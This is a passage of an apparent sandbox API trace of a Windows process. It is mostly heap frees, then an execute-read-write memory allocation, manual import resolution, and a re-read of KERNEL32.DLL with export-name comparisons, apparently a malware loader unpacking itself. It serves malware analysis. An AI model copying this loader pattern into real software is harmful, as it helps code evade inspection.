dwFlags=0x0, lpMem=0x2f92180 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2fa5390 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2fb85a0 | out: hHeap=0x560000) returned 1 [0202.785] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2fcb7b0 | out: hHeap=0x560000) returned 1 [0202.788] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2fde9c0 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2ff1bd0 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3004de0 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3017ff0 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x302b200 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x303e410 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3051620 | out: hHeap=0x560000) returned 1 [0202.790] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3064830 | out: hHeap=0x560000) returned 1 [0202.796] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3077a40 | out: hHeap=0x560000) returned 1 [0202.796] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x308ac50 | out: hHeap=0x560000) returned 1 [0202.797] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x309de60 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x30b1070 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x30c4280 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x30d7490 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x30ea6a0 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x30fd8b0 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3110ac0 | out: hHeap=0x560000) returned 1 [0202.798] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3123cd0 | out: hHeap=0x560000) returned 1 [0202.799] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3136ee0 | out: hHeap=0x560000) returned 1 [0202.799] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x314a0f0 | out: hHeap=0x560000) returned 1 [0203.065] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x315d300 | out: hHeap=0x560000) returned 1 [0203.068] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3170510 | out: hHeap=0x560000) returned 1 [0203.071] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3183720 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3196930 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x31a9b40 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x31bcd50 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x31cff60 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x31e3170 | out: hHeap=0x560000) returned 1 [0203.072] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x31f6380 | out: hHeap=0x560000) returned 1 [0203.075] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3209590 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x321c7a0 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x322f9b0 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3242bc0 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3255dd0 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3268fe0 | out: hHeap=0x560000) returned 1 [0203.077] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x327c1f0 | out: hHeap=0x560000) returned 1 [0203.081] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x328f400 | out: hHeap=0x560000) returned 1 [0203.081] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x32a2610 | out: hHeap=0x560000) returned 1 [0203.082] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x32b5820 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x32c8a30 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x32dbc40 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x32eee50 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3302060 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3315270 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3328480 | out: hHeap=0x560000) returned 1 [0203.083] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x333b690 | out: hHeap=0x560000) returned 1 [0203.087] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x334e8a0 | out: hHeap=0x560000) returned 1 [0203.091] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3361ab0 | out: hHeap=0x560000) returned 1 [0203.091] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3374cc0 | out: hHeap=0x560000) returned 1 [0203.091] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3387ed0 | out: hHeap=0x560000) returned 1 [0203.095] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x339b0e0 | out: hHeap=0x560000) returned 1 [0203.095] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x33ae2f0 | out: hHeap=0x560000) returned 1 [0203.095] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x33c1500 | out: hHeap=0x560000) returned 1 [0203.095] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x33d4710 | out: hHeap=0x560000) returned 1 [0203.320] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x33e7920 | out: hHeap=0x560000) returned 1 [0203.497] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x33fab30 | out: hHeap=0x560000) returned 1 [0203.497] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x340dd40 | out: hHeap=0x560000) returned 1 [0203.497] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3420f50 | out: hHeap=0x560000) returned 1 [0203.498] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3434160 | out: hHeap=0x560000) returned 1 [0203.498] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3447370 | out: hHeap=0x560000) returned 1 [0203.498] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x345a580 | out: hHeap=0x560000) returned 1 [0203.502] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x346d790 | out: hHeap=0x560000) returned 1 [0203.505] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34809a0 | out: hHeap=0x560000) returned 1 [0203.506] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3493bb0 | out: hHeap=0x560000) returned 1 [0203.510] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34a6dc0 | out: hHeap=0x560000) returned 1 [0203.510] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34b9fd0 | out: hHeap=0x560000) returned 1 [0203.510] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34cd1e0 | out: hHeap=0x560000) returned 1 [0203.510] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34e03f0 | out: hHeap=0x560000) returned 1 [0203.513] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x34f3600 | out: hHeap=0x560000) returned 1 [0203.514] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3506810 | out: hHeap=0x560000) returned 1 [0203.514] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3519a20 | out: hHeap=0x560000) returned 1 [0203.514] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x352cc30 | out: hHeap=0x560000) returned 1 [0203.514] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x353fe40 | out: hHeap=0x560000) returned 1 [0203.514] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3553050 | out: hHeap=0x560000) returned 1 [0203.518] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3566260 | out: hHeap=0x560000) returned 1 [0203.520] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3579470 | out: hHeap=0x560000) returned 1 [0203.520] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x358c680 | out: hHeap=0x560000) returned 1 [0203.520] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x359f890 | out: hHeap=0x560000) returned 1 [0203.524] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x35b2aa0 | out: hHeap=0x560000) returned 1 [0203.524] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x35c5cb0 | out: hHeap=0x560000) returned 1 [0203.525] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x35d8ec0 | out: hHeap=0x560000) returned 1 [0203.525] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x35ec0d0 | out: hHeap=0x560000) returned 1 [0203.525] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x35ff2e0 | out: hHeap=0x560000) returned 1 [0203.525] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36124f0 | out: hHeap=0x560000) returned 1 [0203.525] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3625700 | out: hHeap=0x560000) returned 1 [0203.621] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3638910 | out: hHeap=0x560000) returned 1 [0203.623] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x364bb20 | out: hHeap=0x560000) returned 1 [0203.623] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x365ed30 | out: hHeap=0x560000) returned 1 [0203.623] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3671f40 | out: hHeap=0x560000) returned 1 [0203.623] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3685150 | out: hHeap=0x560000) returned 1 [0204.691] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3698360 | out: hHeap=0x560000) returned 1 [0204.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36ab570 | out: hHeap=0x560000) returned 1 [0204.697] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36be780 | out: hHeap=0x560000) returned 1 [0204.697] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36d1990 | out: hHeap=0x560000) returned 1 [0204.697] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36e4ba0 | out: hHeap=0x560000) returned 1 [0204.699] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x36f7db0 | out: hHeap=0x560000) returned 1 [0204.699] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x370afc0 | out: hHeap=0x560000) returned 1 [0204.699] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x371e1d0 | out: hHeap=0x560000) returned 1 [0204.699] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37313e0 | out: hHeap=0x560000) returned 1 [0204.699] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37445f0 | out: hHeap=0x560000) returned 1 [0204.702] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3757800 | out: hHeap=0x560000) returned 1 [0204.704] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x376aa10 | out: hHeap=0x560000) returned 1 [0204.704] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x377dc20 | out: hHeap=0x560000) returned 1 [0204.704] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3790e30 | out: hHeap=0x560000) returned 1 [0204.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37a4040 | out: hHeap=0x560000) returned 1 [0204.710] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37b7250 | out: hHeap=0x560000) returned 1 [0204.714] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37ca460 | out: hHeap=0x560000) returned 1 [0204.714] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37dd670 | out: hHeap=0x560000) returned 1 [0204.715] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x37f0880 | out: hHeap=0x560000) returned 1 [0204.715] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3803a90 | out: hHeap=0x560000) returned 1 [0204.715] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3816ca0 | out: hHeap=0x560000) returned 1 [0204.715] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3829eb0 | out: hHeap=0x560000) returned 1 [0204.719] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x383d0c0 | out: hHeap=0x560000) returned 1 [0204.721] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38502d0 | out: hHeap=0x560000) returned 1 [0204.721] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38634e0 | out: hHeap=0x560000) returned 1 [0205.090] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38766f0 | out: hHeap=0x560000) returned 1 [0205.092] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3889900 | out: hHeap=0x560000) returned 1 [0205.092] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x389cb10 | out: hHeap=0x560000) returned 1 [0205.094] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38afd20 | out: hHeap=0x560000) returned 1 [0205.096] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38c2f30 | out: hHeap=0x560000) returned 1 [0205.120] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38d6140 | out: hHeap=0x560000) returned 1 [0205.121] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38e9350 | out: hHeap=0x560000) returned 1 [0205.121] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x38fc560 | out: hHeap=0x560000) returned 1 [0205.121] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x390f770 | out: hHeap=0x560000) returned 1 [0205.122] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3922980 | out: hHeap=0x560000) returned 1 [0205.123] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3935b90 | out: hHeap=0x560000) returned 1 [0205.123] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3948da0 | out: hHeap=0x560000) returned 1 [0205.125] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x395bfb0 | out: hHeap=0x560000) returned 1 [0205.126] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x396f1c0 | out: hHeap=0x560000) returned 1 [0205.126] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39823d0 | out: hHeap=0x560000) returned 1 [0205.128] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39955e0 | out: hHeap=0x560000) returned 1 [0205.129] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39a87f0 | out: hHeap=0x560000) returned 1 [0205.131] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39bba00 | out: hHeap=0x560000) returned 1 [0205.153] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39cec10 | out: hHeap=0x560000) returned 1 [0205.156] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39e1e20 | out: hHeap=0x560000) returned 1 [0205.156] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x39f5030 | out: hHeap=0x560000) returned 1 [0205.156] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a08240 | out: hHeap=0x560000) returned 1 [0205.157] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a1b450 | out: hHeap=0x560000) returned 1 [0205.158] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a2e660 | out: hHeap=0x560000) returned 1 [0205.159] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a41870 | out: hHeap=0x560000) returned 1 [0205.172] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a54a80 | out: hHeap=0x560000) returned 1 [0205.174] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a67c90 | out: hHeap=0x560000) returned 1 [0205.175] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a7aea0 | out: hHeap=0x560000) returned 1 [0205.179] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3a8e0b0 | out: hHeap=0x560000) returned 1 [0206.165] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3aa12c0 | out: hHeap=0x560000) returned 1 [0206.168] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3ab44d0 | out: hHeap=0x560000) returned 1 [0206.191] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3ac76e0 | out: hHeap=0x560000) returned 1 [0206.197] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3ada8f0 | out: hHeap=0x560000) returned 1 [0206.202] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3aedb00 | out: hHeap=0x560000) returned 1 [0206.203] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b00d10 | out: hHeap=0x560000) returned 1 [0206.204] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b13f20 | out: hHeap=0x560000) returned 1 [0206.206] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b27130 | out: hHeap=0x560000) returned 1 [0206.207] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b3a340 | out: hHeap=0x560000) returned 1 [0206.210] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b4d550 | out: hHeap=0x560000) returned 1 [0206.212] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b60760 | out: hHeap=0x560000) returned 1 [0206.215] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3b73970 | out: hHeap=0x560000) returned 1 [0206.792] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5aa660 | out: hHeap=0x560000) returned 1 [0206.793] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0206.796] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0206.797] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0206.797] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0206.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0206.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0206.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0206.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0206.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0206.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0206.800] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0206.800] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0206.800] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0206.800] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0206.800] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0206.800] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0206.800] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0206.801] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0206.801] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0206.801] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0206.801] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58db10 | out: hHeap=0x560000) returned 1 [0206.802] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0206.806] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x570380 | out: hHeap=0x560000) returned 1 [0206.808] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0206.808] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0206.809] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0206.809] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0206.810] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0206.810] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0206.812] GetProcessHeap () returned 0x560000 [0206.812] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x68) returned 0x568cd0 [0206.813] GetProcessHeap () returned 0x560000 [0206.813] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5791d0 [0206.814] GetProcessHeap () returned 0x560000 [0206.814] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x48) returned 0x570560 [0206.814] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0206.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0206.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0206.815] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0206.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0206.815] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0206.816] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0207.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0207.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0207.121] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0207.122] GetProcessHeap () returned 0x560000 [0207.122] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xac430) returned 0x58c5c0 [0207.125] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0207.125] ReadFile (in: hFile=0x134, lpBuffer=0x58c5c0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x58c5c0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0207.153] CloseHandle (hObject=0x134) returned 1 [0207.153] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0207.162] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0207.162] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0207.162] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0207.162] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0207.162] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0207.162] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0207.162] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0207.162] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0207.163] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 